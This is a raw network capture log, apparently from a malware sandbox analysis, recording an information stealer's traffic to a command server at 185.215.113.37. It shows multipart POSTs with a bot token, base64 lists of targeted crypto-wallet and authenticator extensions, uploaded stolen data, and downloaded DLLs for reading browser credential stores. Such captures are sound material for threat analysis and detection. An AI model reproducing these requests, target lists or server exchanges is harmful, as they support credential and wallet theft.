name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; name="message"plugins------IDAEBGCAAECAKFHIIJDB--
Sep 26, 2024 22:40:04.447477102 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:04 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 26, 2024 22:40:04.447496891 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Sep 26, 2024 22:40:04.447508097 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Sep 26, 2024 22:40:04.447602987 CEST	372	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Sep 26, 2024 22:40:04.448009014 CEST	1236	IN	Data Raw: 63 69 42 51 59 58 4e 7a 64 32 39 79 5a 43 42 4e 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d 74 6e 61 6d 46 6e 5a 32 68 75 62 6d 4e 71 61 32 68 6e 5a 32 52 6f 59 57 78 74 59 32 35 6d 61 32 78 72 66 44 46 38 4d 48 77 77 66 45 46 31 64 47 Data Ascii: ciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHB
Sep 26, 2024 22:40:04.448019981 CEST	1236	IN	Data Raw: 61 47 52 6a 62 32 35 6b 59 6d 4e 69 5a 47 35 69 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 77 77 66 44 42 38 55 6d 6c 7a 5a 53 41 74 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 6f 59 6d 4a 6e 59 6d 56 77 61 47 64 76 61 6d 6c 72 59 57 Data Ascii: aGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5
Sep 26, 2024 22:40:04.448031902 CEST	792	IN	Data Raw: 62 47 56 30 66 47 39 71 5a 32 64 74 59 32 68 73 5a 32 68 75 61 6d 78 68 63 47 31 6d 59 6d 35 71 61 47 39 73 5a 6d 70 72 61 57 6c 6b 59 6d 4e 6f 66 44 46 38 4d 48 77 77 66 46 42 31 62 48 4e 6c 49 46 64 68 62 47 78 6c 64 43 42 44 61 48 4a 76 62 57 Data Ascii: bGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21
Sep 26, 2024 22:40:04.450247049 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFB Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="message"fplugins------GDBFBFCBFBKECAAKJKFB--
Sep 26, 2024 22:40:04.687463999 CEST	335	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:04 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 26, 2024 22:40:04.708097935 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEBFIEBAFCBAAAAKJKJE Host: 185.215.113.37 Content-Length: 7255 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 22:40:04.708132029 CEST	7255	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 46 49 45 42 41 46 43 42 41 41 41 41 4b 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 Data Ascii: ------IEBFIEBAFCBAAAAKJKJEContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------IEBFIEBAFCBAAAAKJKJEContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 26, 2024 22:40:05.589402914 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:04 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 22:40:05.882802010 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 22:40:06.108514071 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:05 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 26, 2024 22:40:06.108532906 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Sep 26, 2024 22:40:06.108541965 CEST	248	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q
Sep 26, 2024 22:40:07.503062963 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGIEBGHDAEBGDGCFIID Host: 185.215.113.37 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 22:40:08.246300936 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:07 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 22:40:08.331126928 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJECGDGCBKECAKFBGCA Host: 185.215.113.37 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 22:40:09.054472923 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:08 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 22:40:09.093096972 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAK Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="file"------IEHJJECBKKECFIEBGCAK--
Sep 26, 2024 22:40:09.824026108 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 22:40:10.657757998 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAECFHJEBAAFIEBGHIIE Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BAECFHJEBAAFIEBGHIIEContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------BAECFHJEBAAFIEBGHIIEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BAECFHJEBAAFIEBGHIIEContent-Disposition: form-data; name="file"------BAECFHJEBAAFIEBGHIIE--
Sep 26, 2024 22:40:12.207714081 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 22:40:12.208811998 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 22:40:12.209415913 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 22:40:13.386862993 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 22:40:13.612481117 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:13 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 26, 2024 22:40:14.932106018 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 22:40:15.158019066 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:15 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 26, 2024 22:40:16.083204985 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 22:40:16.308707952 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:16 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 